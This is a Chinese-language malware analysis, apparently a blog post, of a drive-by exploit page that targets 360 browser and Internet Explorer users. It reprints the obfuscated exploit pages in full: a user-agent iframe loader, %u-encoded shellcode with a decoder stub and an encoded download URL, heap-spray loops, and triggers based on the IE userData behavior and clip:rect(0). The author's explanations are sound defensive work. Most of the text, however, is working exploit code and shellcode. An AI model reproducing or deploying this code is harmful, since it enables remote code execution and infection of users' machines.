最近针对360浏览器的病毒分析


病毒默认地址:hxxp://www[.]w22rt[.]com/360safe.html(链接已做无害化改写;不要轻易打开,会中毒的)

里面的代码是:

<html>
<head>
<body>
<script>
if(navigator.userAgent.toLowerCase().indexOf("/x6D/x73"+"/x69/x65"+"/x20/x37")==-1);
document.write("<iframe width=100 height=0 src=360.html></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("/x6D/x73"+"/x69/x65"+"/x20/x37")>0);
document.write("<iframe width=100 height=0 src=361.html></iframe>");
</script>
</body>
</head>
</html>

 

从上开始看:

1、navigator.userAgent.toLowerCase()代表将用户浏览器类型取出来,小写。

"/x6D/x73"+"/x69/x65"+"/x20/x37"(原始代码里应为 \x 转义,转贴时反斜杠变成了"/")解析过来是 msie 7

如果不是IE7浏览器,加载360.html(这是代码的意图;但按上面贴出的写法,两个if(...)后面都紧跟着分号,条件体为空,两句document.write实际上会无条件执行,360.html和361.html都会被加载)

2、如果是IE7浏览器,加载361.html

 

主要的代码是在360.html和361.html里面,下面咱们来一起分析一下。

 

360.HTML:

开头是:

<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
// Error handler that swallows every script error: a window.onerror handler
// that returns true suppresses the browser's default error reporting.
function killErrors() {
return true;
}
// Installed page-wide, so the scripts that follow fail silently instead of
// showing a script-error dialog to the user.
window.onerror = killErrors;
// -->
</SCRIPT>

主要作用,屏蔽JS的错误,以免版本低的浏览器,弹出脚本错误框,偷偷摸摸的运行。

接下来:

try {
            new ActiveXObject("yutian");
      }

同样用容错的方式创建控件yutian

如果不存在(贴出的代码里没有任何地方注册名为yutian的控件,所以一般都会走到这里),那么会被catch(e)。

catch (e) {

//如果创建控件失败则执行这里
var ytpps="%uyt9yt2yt9yt2";//声明了一个变量
var UUse=(ytpps.replace(/yt/g,"")); //用正则表达式方式去掉上面那个变量中间的yt。那么剩下的就是%u9292
var YTMTV="%ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%u8fca%ucf8f%u93c9%ud2de%u92d0%u8b8e%uce8d%udbdc%u93d8%ucede%uBDce%uBD";

var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"BD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%

u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
var YTavp88=(YTavp.replace(/yutian/g,"")); //替换上面字符串中的yutian。剩下的就是:

%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA


var YTavp99="%"+"u"+"54"+"FF"+"%u"+"BE"+"A3%uB"+"DyutianBD%uD9"+"E2%u8D1C%uBD"+"BD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBD"+"BF%u2D"+"BD%u455F%u8ED5%uBD8F%

u"+"D5BD%uCE"+"E8%uCF"+"D8%u36E9"+"%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF"+"%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2"+"D5%

uBDD3%uD5"+"BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355"+"%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uF"+"B36%u55"+"B1%uB"+"CD2%uBDBD%u5536%

uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u5"+"13C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u4"+"2BD%uE1"+"EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%

uF9"+"7A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBD"+"BC%u3"+"EB"+"D%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%

u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%

u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%

uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%

u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%

uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%

uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%

u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2CyutianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%

uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uAD"+"B7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%

uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCF"+"D8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%

u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u34"+"05%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%

uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%

u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%

u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEA"+"C9%uByutian0DB%uFE42%u11"+"03%uC066%u18yutian4D%uEF27%

u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u1"+"2yutian6"+"B"+"%u46"+"27%u"+"A"+"8"+"E"+"E";
var YTavp98=(YTavp99.replace(/yutian/g,""));

//同上,剩下的就是:

%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uE4E1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u
55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE

 

//据我分析,应该是文件内容(补充:这种%u编码的数据后面经unescape解码、再被大量复制到字符串数组里,更符合shellcode即待执行机器码的特征,而不是普通的文件内容)
}

接下来,再次创建这个控件。

      try {
            new ActiveXObject("yutian");
      }

如果出错则:

      catch (e) {
var YTavp123="%"+"u"+"5"+"8"+"yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%

u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
var YTavp1=(YTavp123.replace(/yutianayt/g,""));

//剩下的就是:

%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF


}

接下来,再次尝试:

      try {
            new ActiveXObject("yutian");
      }
      catch (e) {

var PPSytytYYtTTyyutianAVpYyTt=unescape(UUse+YTavp1+YTavp98+YTMTV+YTavp88);

//组合代码解码。
}

<SCRIPT
language=javascript>
document.writeln("<BUTTON id=PPSytytYYtTTyyutian style=/"DISPLAY: none/" onclick=newTyPPSytytYYtTTyyutianAVpYyTt();><//BUTTON>")

//创建一个隐藏的button,代替客户端点击按钮
// Fills a global array with 270 large strings, each made of two copies of a
// filler string followed by PPSytytYYtTTyyutianAVpYyTt (the string produced
// earlier by unescape() on the concatenated %u-encoded pieces).
// NOTE(review): this layout is consistent with heap spraying, i.e. placing
// many copies of the decoded data in browser memory; the browser freezing
// is a side effect of the allocations, not necessarily the goal.
function PPSytytYYtTTyyutianAVp(){

YtYtTyPPSytytYYtTTyyutianAVpYyTt = new Array();

// The array is assigned without var, so it becomes a global and stays
// referenced after this function returns.
// Target size of one filler half: 0x86000 minus twice the payload length
// (the author's note gives 547872 for this value).
var BIytKKTyPPSytytYYtTTyyutianAVpYyTt = 0x86000-(PPSytytYYtTTyyutianAVpYyTt.length*2);//547872

// 'kaix' is a placeholder for '%u'; after the replace the string is
// '%u0c0c%u0c0c', which unescape() turns into two 0x0c0c characters.
var nopaca = 'kaix0c0c'+'kaix0c0c';
var LFlwBa=unescape(nopaca.replace(/kaix/g,'%u'));
// Double the filler until it is at least half the target size.
while(LFlwBa.length<BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2)
{ LFlwBa+=LFlwBa; }
var youxiYTYTyyttYtTYyTian = LFlwBa.substring(0,BIytKKTyPPSytytYYtTTyyutianAVpYyTt/2);

// Keep exactly half the target size as the filler block.
// LFlwBa was declared with var, so this delete does not remove the variable
// and does not release the string; the statement has no practical effect.
delete LFlwBa;
// The loop counter is an undeclared (implicitly global) variable.
for(YTiancazaWaGa=0; YTiancazaWaGa<270; YTiancazaWaGa++) { 
YtYtTyPPSytytYYtTTyyutianAVpYyTt[YTiancazaWaGa] = youxiYTYTyyttYtTYyTian + youxiYTYTyyttYtTYyTian + PPSytytYYtTTyyutianAVpYyTt;

// 270 array elements (strings, not arrays) are created: filler + filler +
// decoded payload. The heavy CPU and memory use the author observed follows
// from allocating this many large strings.
}
}
// Click handler of the hidden button: first fills memory through
// PPSytytYYtTTyyutianAVp(), then manipulates an element that carries the
// userData behavior.
function newTyPPSytytYYtTTyyutianAVpYyTt(){
PPSytytYYtTTyyutianAVp();// fill the global array first
// Creates a body element; the tag name is split as 'bo'+'dy', presumably to
// avoid simple string matching - TODO confirm.
var yutYianYtAYtVP = document.createElement('bo'+'dy');
yutYianYtAYtVP.addBehavior('#default#userData');

// '#default#userData' is Internet Explorer's userData persistence behavior
// (a cookie-like client-side store). Nothing is saved to or loaded from that
// store in this function.

document.appendChild(yutYianYtAYtVP);// attach the new element to the document
try
{
  for (YTiancazaWaGa=0; YTiancazaWaGa<10; YTiancazaWaGa++)
{
// Sets attribute 's' to the window object ten times on the element that has
// the behavior attached.
// NOTE(review): no stored data is executed here; this repeated assignment is
// presumably the step meant to trigger a memory-corruption bug in the
// browser. The page does not identify which bug - confirm against the
// patched browser component before relying on this reading.
yutYianYtAYtVP.setAttribute('s',window);
 
}
} catch(e){ }
// Any exception from the loop is swallowed by the empty catch above.
// Appends an empty string to window.status, which leaves the status text
// unchanged rather than clearing it; the purpose is not evident from the page.
window.status+='';
}

document.getElementById('PPSytytYYtTTyyutian').onclick(); //模拟客户端点击
</SCRIPT>

 

所以一打开浏览器就卡死了。作者当时给出的唯一办法是禁用脚本(卡死只是大量申请内存的副作用,除了禁用脚本,还应及时安装浏览器的安全更新)。

 

第二个,来看看361.html

<html><head>
<script>function YYTSS(bytes, mystr, kYTTYu_url, kYTTYu_exp)
{
var ytpps="%uyt9yt0yt9yt0%uyt9yt0yt9yt0";
var UUse=(ytpps.replace(/yt/g,""));
var YTavp="%"+"yutianu"+"ByutianD"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%"+"u"+"B"+"D"+"ByutianD"+"%u"+"BD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"ByutianD"+"BD"+"%u"+"BD"+"ByutianD"+"%u"+"BD"+"ByutianD"+"%u"+"EAEA";
var YTavp88=(YTavp.replace(/yutian/g,""));
var YTavp99="%"+"u"+"54"+"FF"+"%u"+"BE"+"A3%uB"+"DyutianBD%uD9"+"E2%u8D1C%uBD"+"BD%u36BD%uB1FD%uCD36%u10A1"+"%uD536%u36B5%uD74A%uE4AC%u0355%uBD"+"BF%u2D"+"BD%u455F%u8ED5%uBD8F%u"+"D5BD%uCE"+"E8%uCF"+"D8%u36E9"+"%uB1FB%u0355%uyutianBDBC%u36BD%uD7yutian55%uE4B8"+"%u2355%uBDBF"+"%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u"+"7D38%uAEC8%uD2"+"D5%uBDD3%uD5"+"BD%uCFC8%uD0D1%u36E9%uB1FB%u3355"+"%uBDBC%u36BD%uD755%uE4BC%uD355"+"%uBDBF%u5FBD%uD544%u8ED1%uBD8F%u"+"CED5%uD8D5%uE9D1%uF"+"B36%u55"+"B1%uB"+"CD2%uBDBD%u5536%uBCD7%u55E4"+"%uBFF2%uBDBD%u445F%u5"+"13C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%u"+"BDyutianD7%uA7D7%uD7EE%u4"+"2BD%uE1"+"EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44"+"%uBEB9%uE4E1%uD893%uF9"+"7A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u"+"8EEC%u367D%uE5FB%u9F55%uBD"+"BC%u3"+"EB"+"D%uBD45%u1E54%uBDBD%u2DBD"+"%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%u"+"BCBC%uBDBD%uFB34%uD7DD%uEDyutianBD%uEB42%u3495%uD9FB%uFB36%uD7DD"+"%uD7BD%uD7BD%uD7BD%uD7yutianB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%u"+"BDA2%uByutianDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909"+"%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u"+"7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7yutianBD%uD7BD%uD7BD"+"%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%u"+"CB42%uEDCD%uCB42%u42DD%u8DEB%uCByutian42%u42DD%u89EB%uCB42%u42C5"+"%uFDEB%u4636%u7D8E%u66yutian8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u"+"34Byutian5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED"+"%uEDEE%uEDyutianED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%"+"u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB"+"%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDyutianB9%uBDBD%u1D30%u42DD%u4242%"+"uD8D7%uCB42%u3681%uADyutianFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE"+"%u3D6D%u55yutian85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u"+"36E8%u3051%uB8FD%u5D42%u1Byutian55%uBDBD%u7EBD%u1D55%uBDyutianBD%u0yutian5BD"+"%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5yutian13C%uBCBD%uBDBD%u4136%"+"u7A3E%u7AB9%u8FBA%u2Cyut
ianC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5"+"%u2AyutianD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%"+"uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A"+"%u259D%uAD"+"B7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5yutian36%u"+"36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8yutianED5%uBD8F%uD5BD"+"%uCEE8%uCF"+"D8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%u"+"BDBD%u445F%u428E%u42yutianEA%uB9yutianEB%uBF56%u7EE5%u4455%u4242%uE642"+"%uBA7B%u34"+"05%yutianuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61yutian36%uD7EE%uD5FD%u"+"ADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8"+"%uC93yutian6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%yutianuBE10%u8E78%u"+"B266%uAD03%u6Byutian87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8"+"%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36yutian60%u3yutian6B9%u78yutianBE%u"+"E316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5"+"%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%u"+"A376%uyutianD919%u2E5yutian2%u59yutian8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230"+"%uEA"+"C9%uByutian0DB%uFE42%u11"+"03%uC066%u18yutian4D%uEF27%u1A43%u8367%u0ByutianA0%u0584%u69yutianD4%u03A6%uyutianDBC2%u411D%u8A14%u25yutian10%uyutianAyutianDB7%yutianu3D45%u1"+"2yutian6"+"B"+"%u46"+"27%u"+"A"+"8"+"E"+"E";
var YTavp98=(YTavp99.replace(/yutian/g,""));
var YTavp123="%"+"u"+"5"+"8"+"yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
var YTavp1=(YTavp123.replace(/yutianayt/g,""));
var dijfidfYTjsd = unescape(UUse+YTavp1+YTavp98+kYTTYu_url+YTavp88);

 

while (mystr.length< bytes) mystr += mystr;return mystr.substr(0, (bytes-6)/2) + dijfidfYTjsd;}</script>
</head><body>
<script>var evil = new Array();var kYTTYu_exp = "/x25/x75/x45/x34/x42/x43/x25/x75/x44/x33/x35/x35/x25/x75/x42/x44/x42/x46/x25/x75/x35/x46/x42/x44/x25/x75/x44/x35/x34/x34/x25/x75/x38/x45/x44/x31/x25/x75/x42/x44/x38/x46/x25/x75/x43/x45/x44/x35/x25/x75/x44/x38/x44/x35/x25/x75/x45/x39/x44/x31/x25/x75/x46/x42/x33/x36/x25/x75/x35/x35/x42/x31/x25/x75/x42/x43/x44/x32/x25/x75/x42/x44/x42/x44/x25/x75/x35/x35/x33/x36/x25/x75/x42/x43/x44/x37/x25/x75/x35/x35/x45/x34/x25/x75/x42/x46/x46/x32";var kYTTYu_url = "%ud5db%uc9c9%u87cd%u9292%ucaca%u93ca%u8fca%ucf8f%u93c9%ud2de%u92d0%u8b8e%uce8d%udbdc%u93d8%ucede%uBDce%uBD";var YYTTXA = unescape("/x25/x75/x30/x64/x30/x64/x25/x75/x30/x64/x30/x64");
YYTTXA = YYTSS(733120, YYTTXA, kYTTYu_url, kYTTYu_exp);
for(var k = 0; k < 1000; k++) {evil[k] = YYTTXA.substr(0, YYTTXA.length);}document.write("<table style=position:absolute;clip:rect(0)>");</script>
</body></html>

所有的代码我粘贴在这里了,大概原理和上面一样:先用循环把同一段数据复制1000份铺满内存,最后一句position:absolute;clip:rect(0);设置截取范围为0(这一句很可能才是用来触发浏览器漏洞的地方,具体是哪个漏洞原文没有给出)

当你下一次打开这个页面的时候,就执行那个代码,也就是控件,但是内容还没搞清楚是什么。继续研究中,暂时到这里吧